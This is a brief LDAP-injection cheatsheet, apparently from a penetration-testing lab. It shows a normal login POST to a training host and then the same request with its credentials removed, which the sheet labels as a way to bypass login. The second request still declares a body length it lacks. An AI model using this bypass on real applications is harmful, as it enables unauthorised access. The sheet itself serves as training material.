Cheatsheet for LDAPi:

POST / HTTP/1.1
Host: ptl-69f15fd0-7716108c.libcurl.so
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ptl-69f15fd0-7716108c.libcurl.so/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

username=aa&password=bb

-----------------------------

REMOVE THE PAYLOAD TO BYPASS LOGIN:

POST / HTTP/1.1
Host: ptl-69f15fd0-7716108c.libcurl.so
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ptl-69f15fd0-7716108c.libcurl.so/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

